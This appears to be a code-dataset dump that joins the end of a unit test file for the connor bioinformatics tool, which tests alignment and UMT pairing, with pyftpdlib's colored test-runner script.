reference_id=3,
reference_start=142,
mapping_quality=20,
cigarstring="8M",
next_reference_id=4,
next_reference_start=242,
template_length=100,
query_sequence="ACGTACGT",
query_qualities=[20]*8,
)
pysam_align.set_tag('X1', 'foo')
connor_align = ConnorAlign(pysam_align)
self.assertEqual('queryname_1', connor_align.query_name)
self.assertEqual(99, connor_align.flag)
self.assertEqual(3, connor_align.reference_id)
self.assertEqual(142, connor_align.reference_start)
self.assertEqual(20, connor_align.mapping_quality)
self.assertEqual('8M', connor_align.cigarstring)
self.assertEqual(242, connor_align.next_reference_start)
self.assertEqual(100, connor_align.template_length)
self.assertEqual('ACGTACGT',
ConnorAlignTest.byte_array_to_string(connor_align.query_sequence))
self.assertEqual([20] * 8, connor_align.query_qualities)
self.assertEqual(150, connor_align.reference_end)
self.assertEqual('foo', connor_align.get_tag('X1'))
self.assertEqual([('X1', 'foo')], connor_align.get_tags())
def test_settersPassthroughToPysamAlignSegment(self):
pysam_align = self.mock_align(query_name="queryname_1",
flag=99,
reference_id=3,
reference_start=142,
mapping_quality=20,
cigarstring="8M",
next_reference_id=4,
next_reference_start=242,
template_length=100,
query_sequence="ACGTACGT",
query_qualities=[20]*8,
)
connor_align = ConnorAlign(pysam_align)
connor_align.query_name = 'queryname_11'
connor_align.flag = 147
connor_align.reference_id = 13
connor_align.reference_start = 1142
connor_align.mapping_quality = 120
connor_align.cigarstring = "2S8M"
connor_align.next_reference_id = 14
connor_align.next_reference_start = 1242
connor_align.template_length = 1100
connor_align.query_sequence = "TTACGTACGT"
connor_align.query_qualities = [20]*10
connor_align.set_tag('X1', 'foo', 'Z')
self.assertEqual('queryname_11', pysam_align.query_name)
self.assertEqual(147, pysam_align.flag)
self.assertEqual(13, pysam_align.reference_id)
self.assertEqual(1142, pysam_align.reference_start)
self.assertEqual(120, pysam_align.mapping_quality)
self.assertEqual('2S8M', pysam_align.cigarstring)
self.assertEqual(1242, pysam_align.next_reference_start)
self.assertEqual(1100, pysam_align.template_length)
self.assertEqual('TTACGTACGT',
ConnorAlignTest.byte_array_to_string(pysam_align.query_sequence))
self.assertEqual([20] * 10, pysam_align.query_qualities)
self.assertEqual(1150, pysam_align.reference_end)
self.assertEqual(('foo', 'Z'),
pysam_align.get_tag('X1', with_value_type=True))
def test_filter(self):
pysam_align = self.mock_align(query_name="queryname_1",
flag=99,
reference_id=3,
reference_start=142,
mapping_quality=20,
cigarstring="8M",
next_reference_id=4,
next_reference_start=242,
template_length=100,
query_sequence="ACGTACGT",
query_qualities=[20]*8,
)
connor_align = ConnorAlign(pysam_align)
self.assertEqual(None, connor_align.filter_value)
connor_align.filter_value = 'foo'
self.assertEqual('foo', connor_align.filter_value)
def test_orientation_left(self):
pysam_align = self.mock_align(reference_start=100, next_reference_start=200)
self.assertEqual('left', ConnorAlign(pysam_align).orientation)
def test_orientation_right(self):
pysam_align = self.mock_align(reference_start=200, next_reference_start=100)
self.assertEqual('right', ConnorAlign(pysam_align).orientation)
def test_orientation_sameIsNeither(self):
pysam_align = self.mock_align(flag=129,
reference_start=100,
next_reference_start=100)
self.assertEqual('neither', ConnorAlign(pysam_align).orientation)
class PairedAlignmentTest(BaseConnorTestCase):
    """Tests for PairedAlignment: a left/right pair of aligns plus their UMT.

    NOTE: the deprecated unittest aliases (assertEquals, assertNotEquals,
    assertRaisesRegexp) were replaced with their modern spellings
    (assertEqual, assertNotEqual, assertRaisesRegex); the aliases were
    removed in Python 3.12.
    """

    def test_init(self):
        """Constructor keeps both aligns and extracts the UMT bases."""
        left_align = self.mock_align(query_name="alignA",
                                     query_sequence="AAATTT" "GGGG")
        right_align = self.mock_align(query_name="alignA",
                                      query_sequence="TTTT" "CCCGGG")
        tag_length = 6
        actual_paired_alignment = PairedAlignment(left_align,
                                                  right_align,
                                                  tag_length)
        self.assertIs(left_align, actual_paired_alignment.left)
        self.assertIs(right_align, actual_paired_alignment.right)
        left_umt = self.byte_array_to_string(actual_paired_alignment.umt[0])
        right_umt = self.byte_array_to_string(actual_paired_alignment.umt[1])
        # UMT = leading tag_length bases of left, trailing tag_length of right.
        self.assertEqual(("AAATTT", "CCCGGG"), (left_umt, right_umt))

    def test_init_valueErrorOnInconsistentQueryNames(self):
        """Left/right aligns with different query names must be rejected."""
        left = self.mock_align(query_name="alignA")
        right = self.mock_align(query_name="alignB")
        self.assertRaisesRegex(ValueError,
                               (r'Inconsistent query names '
                                r'\(alignA != alignB\)'),
                               PairedAlignment,
                               left,
                               right,
                               tag_length=1)

    def test_cigars(self):
        """cigars() returns a (left, right) tuple or a formatted string."""
        left = MicroMock(query_name='A',
                         cigarstring='1S2M4S',
                         query_sequence='AAAAAA')
        right = MicroMock(query_name='A',
                          cigarstring='16S32M64S',
                          query_sequence='AAAAAA')
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual(('1S2M4S', '16S32M64S'), paired_alignment.cigars())
        self.assertEqual('1S2M4S~16S32M64S',
                         paired_alignment.cigars('{left}~{right}'))

    def test_positions(self):
        """positions() is 1-based (left start + 1, right end + 1)."""
        left = MicroMock(query_name='A',
                         reference_start=100,
                         reference_end=150,
                         query_sequence='AAAAAA')
        right = MicroMock(query_name='A',
                          reference_start=200,
                          reference_end=250,
                          query_sequence='AAAAAA')
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual((101, 251), paired_alignment.positions())
        self.assertEqual('101~251',
                         paired_alignment.positions('{left}~{right}'))

    def test_filter_value(self):
        """filter_value is None when neither side is filtered, else a tuple."""
        left = ConnorAlign(self.mock_align(), filter_value=None)
        right = ConnorAlign(self.mock_align(), filter_value=None)
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual(None, paired_alignment.filter_value)

        # Empty strings are falsy: still treated as "not filtered".
        left = ConnorAlign(self.mock_align(), filter_value='')
        right = ConnorAlign(self.mock_align(), filter_value='')
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual(None, paired_alignment.filter_value)

        left = ConnorAlign(self.mock_align(), filter_value='foo')
        right = ConnorAlign(self.mock_align(), filter_value=None)
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual(('foo', None), paired_alignment.filter_value)

        left = ConnorAlign(self.mock_align(), filter_value=None)
        right = ConnorAlign(self.mock_align(), filter_value='bar')
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual((None, 'bar'), paired_alignment.filter_value)

    def test_query_name(self):
        """query_name mirrors the (shared) query name of the pair."""
        left = self.mock_align(query_name="alignA", reference_start=100)
        right = self.mock_align(query_name="alignA", reference_start=200)
        paired_alignment = PairedAlignment(left, right, tag_length=1)
        self.assertEqual("alignA", paired_alignment.query_name)

    def test_eq(self):
        """Pairs are equal iff left, right, and tag_length all match."""
        umt_length = 6
        left = self.mock_align(reference_start=100, next_reference_start=200)
        right = self.mock_align(reference_start=200, next_reference_start=100)
        other = self.mock_align(reference_start=0, next_reference_start=500)
        base = PairedAlignment(left, right, umt_length)
        self.assertEqual(base, PairedAlignment(left, right, umt_length))
        self.assertNotEqual(base, PairedAlignment(other, right, umt_length))
        self.assertNotEqual(base, PairedAlignment(left, other, umt_length))
        self.assertNotEqual(base, PairedAlignment(left, right, 1))

    def test_hash(self):
        """Equivalent pairs hash identically and collapse inside a set."""
        umt_length = 6
        left_A = self.mock_align(query_name="alignA", reference_start=100)
        right_A = self.mock_align(query_name="alignA", reference_start=200)
        left_B = self.mock_align(query_name="alignA", reference_start=100)
        right_B = self.mock_align(query_name="alignA", reference_start=200)
        actual_set = set()
        base = PairedAlignment(left_A, right_A, umt_length)
        actual_set.add(base)
        self.assertEqual(1, len(actual_set))
        # Re-adding the same object is a no-op.
        actual_set.add(base)
        self.assertEqual(1, len(actual_set))
        # A new pair over the same aligns is equal, so no growth.
        actual_set.add(PairedAlignment(left_A, right_A, umt_length))
        self.assertEqual(1, len(actual_set))
        # Distinct-but-equivalent mock aligns also collapse.
        equivalent_pair = PairedAlignment(left_B, right_B, umt_length)
        actual_set.add(equivalent_pair)
        self.assertEqual(1, len(actual_set))

    def test_replace_umt(self):
        """replace_umt swaps the UMT bases but preserves base qualities."""
        left_A = self.mock_align(query_sequence='AANN', query_qualities=[1,2,3,4])
        right_A = self.mock_align(query_sequence='NNCC', query_qualities=[5,6,7,8])
        paired_align = PairedAlignment(left_A, right_A, tag_length=2)
        paired_align.replace_umt(('GG','TT'))
        left = paired_align.left
        right = paired_align.right
        self.assertEqual('GGNN',
                         self.byte_array_to_string(left.query_sequence))
        self.assertEqual('NNTT',
                         self.byte_array_to_string(right.query_sequence))
        self.assertEqual([1,2,3,4],
                         left.query_qualities)
        self.assertEqual([5,6,7,8],
                         right.query_qualities)

    def test_replace_umt_errorIfInconsistentUmtLength(self):
        """Each UMT component must be exactly tag_length long."""
        left_A = self.mock_align(query_sequence='AANN', query_qualities=[1,2,3,4])
        right_A = self.mock_align(query_sequence='NNCC', query_qualities=[5,6,7,8])
        paired_align = PairedAlignment(left_A, right_A, tag_length=2)
        self.assertRaisesRegex(ValueError,
                               r'Each UMT must match tag_length \(2\)',
                               paired_align.replace_umt,
                               ('G','TT'))
        self.assertRaisesRegex(ValueError,
                               r'Each UMT must match tag_length \(2\)',
                               paired_align.replace_umt,
                               ('GG','T'))
        self.assertRaisesRegex(ValueError,
                               r'Each UMT must match tag_length \(2\)',
                               paired_align.replace_umt,
                               (None, None))
        self.assertRaisesRegex(ValueError,
                               r'Each UMT must match tag_length \(2\)',
                               paired_align.replace_umt,
                               ('G',))
| 47.70915 | 91 | 0.612645 |
79555c2b59b237d99e9afc06647ae9779f592529 | 4,466 | py | Python | pyftpdlib/test/runner.py | cclauss/pyftpdlib | b2f078cabe3b6a9ca0129dada516c1396c8477b9 | [
"MIT"
] | 69 | 2015-12-28T07:02:51.000Z | 2022-03-31T13:36:42.000Z | pyftpdlib/test/runner.py | cclauss/pyftpdlib | b2f078cabe3b6a9ca0129dada516c1396c8477b9 | [
"MIT"
] | 23 | 2016-03-04T10:43:24.000Z | 2021-03-17T09:58:19.000Z | pyftpdlib/test/runner.py | cclauss/pyftpdlib | b2f078cabe3b6a9ca0129dada516c1396c8477b9 | [
"MIT"
] | 24 | 2016-02-29T11:45:47.000Z | 2021-12-24T08:41:37.000Z | #!/usr/bin/env python
# Copyright (C) 2007 Giampaolo Rodola' <g.rodola@gmail.com>.
# Use of this source code is governed by MIT license that can be
# found in the LICENSE file.
from __future__ import print_function
import atexit
import os
import sys
from unittest import TestResult
from unittest import TextTestResult
from unittest import TextTestRunner
try:
import ctypes
except ImportError:
ctypes = None
from pyftpdlib.test import configure_logging
from pyftpdlib.test import remove_test_files
from pyftpdlib.test import unittest
from pyftpdlib.test import VERBOSITY
HERE = os.path.abspath(os.path.dirname(__file__))
# ANSI (posix) vs win32 console color codes used by the colored runner.
if os.name == 'posix':
    GREEN = 1
    RED = 2
    BROWN = 94
else:
    GREEN = 2
    RED = 4
    BROWN = 6
    DEFAULT_COLOR = 7


def term_supports_colors(file=sys.stdout):
    """Return True if *file* appears to be a terminal that supports colors.

    On Windows this only checks that ctypes is importable.  On posix it
    requires *file* to be a tty and curses to report at least one color.
    FIX: the original used bare ``assert`` statements for these checks;
    under ``python -O`` asserts are stripped, which made this wrongly
    return True for non-tty streams.  Explicit tests are -O safe.
    """
    if os.name == 'nt':
        return ctypes is not None
    try:
        import curses
        if not file.isatty():
            return False
        curses.setupterm()
        return curses.tigetnum("colors") > 0
    except Exception:
        # Any curses failure (no terminfo, dumb terminal, ...) means no color.
        return False


def hilite(s, color, bold=False):
    """Return *s* wrapped in ANSI escape codes for *color*.

    *color* must be one of the module constants GREEN, RED or BROWN;
    anything else raises ValueError.  *bold* adds the bold attribute.
    """
    attr = []
    if color == GREEN:
        attr.append('32')
    elif color == RED:
        attr.append('91')   # bright red
    elif color == BROWN:
        attr.append('33')
    else:
        raise ValueError("unrecognized color")
    if bold:
        attr.append('1')
    return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), s)
def _stderr_handle():
    """Return the win32 stderr console handle (closed again at exit)."""
    STD_ERROR_HANDLE_ID = ctypes.c_ulong(0xfffffff4)
    get_std_handle = ctypes.windll.Kernel32.GetStdHandle
    get_std_handle.restype = ctypes.c_ulong
    handle = get_std_handle(STD_ERROR_HANDLE_ID)
    # Make sure the handle is released when the interpreter shuts down.
    atexit.register(ctypes.windll.Kernel32.CloseHandle, handle)
    return handle
def win_colorprint(printer, s, color, bold=False):
    """Emit *s* through *printer* using win32 console text attributes."""
    if bold and color <= 7:
        # High-intensity variants live 8 slots above the base colors.
        color += 8
    handle = _stderr_handle()
    set_attribute = ctypes.windll.Kernel32.SetConsoleTextAttribute
    set_attribute(handle, color)
    try:
        printer(s)
    finally:
        # Always restore the console to its default color.
        set_attribute(handle, DEFAULT_COLOR)
class ColouredResult(TextTestResult):
    """TextTestResult that paints OK / FAIL / ERROR / skip lines in color."""

    def _color_print(self, s, color, bold=False):
        """Write one colored line, using ANSI on posix, win32 APIs elsewhere."""
        if os.name == 'posix':
            self.stream.writeln(hilite(s, color, bold=bold))
            return
        win_colorprint(self.stream.writeln, s, color, bold=bold)

    def addSuccess(self, test):
        # Call TestResult (skipping TextTestResult) so the default
        # uncolored status text is not printed as well.
        TestResult.addSuccess(self, test)
        self._color_print("OK", GREEN)

    def addError(self, test, err):
        TestResult.addError(self, test, err)
        self._color_print("ERROR", RED, bold=True)

    def addFailure(self, test, err):
        TestResult.addFailure(self, test, err)
        self._color_print("FAIL", RED)

    def addSkip(self, test, reason):
        TestResult.addSkip(self, test, reason)
        self._color_print("skipped: %s" % reason, BROWN)

    def printErrorList(self, flavour, errors):
        # Colorize the flavour label; ERROR is additionally bolded.
        flavour = hilite(flavour, RED, bold=flavour == 'ERROR')
        TextTestResult.printErrorList(self, flavour, errors)
class ColouredRunner(TextTestRunner):
    """TextTestRunner that emits colored results when the terminal allows.

    The result class is chosen once, at import time, based on whether the
    current terminal supports colors.
    """

    resultclass = ColouredResult if term_supports_colors() else TextTestResult

    def _makeResult(self):
        # Store result instance so that it can be accessed on
        # KeyboardInterrupt.
        self.result = TextTestRunner._makeResult(self)
        return self.result
def get_suite(name=None):
    """Build the test suite.

    With no *name*, load every ``test_*.py`` module in this package;
    otherwise load just the named test module.
    """
    suite = unittest.TestSuite()
    loader = unittest.defaultTestLoader
    if name is None:
        for fname in os.listdir(HERE):
            if fname.startswith('test_') and fname.endswith('.py'):
                # Use the fully dotted module path so that the full test
                # paths are printed on screen.
                modname = "pyftpdlib.test.%s" % os.path.splitext(fname)[0]
                suite.addTest(loader.loadTestsFromName(modname))
    else:
        modname = os.path.splitext(os.path.basename(name))[0]
        suite.addTest(loader.loadTestsFromName(modname))
    return suite
def main(name=None):
    """Entry point: set up logging, clear stale test files, run the suite.

    Exits with status 0 on success, 1 on failure or interruption.
    """
    configure_logging()
    remove_test_files()
    runner = ColouredRunner(verbosity=VERBOSITY)
    try:
        result = runner.run(get_suite(name))
    except (KeyboardInterrupt, SystemExit) as err:
        # Dump whatever errors were collected before the interruption.
        print("received %s" % err.__class__.__name__, file=sys.stderr)
        runner.result.printErrors()
        sys.exit(1)
    else:
        sys.exit(0 if result.wasSuccessful() else 1)


if __name__ == '__main__':
    main()
| 28.08805 | 78 | 0.661666 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.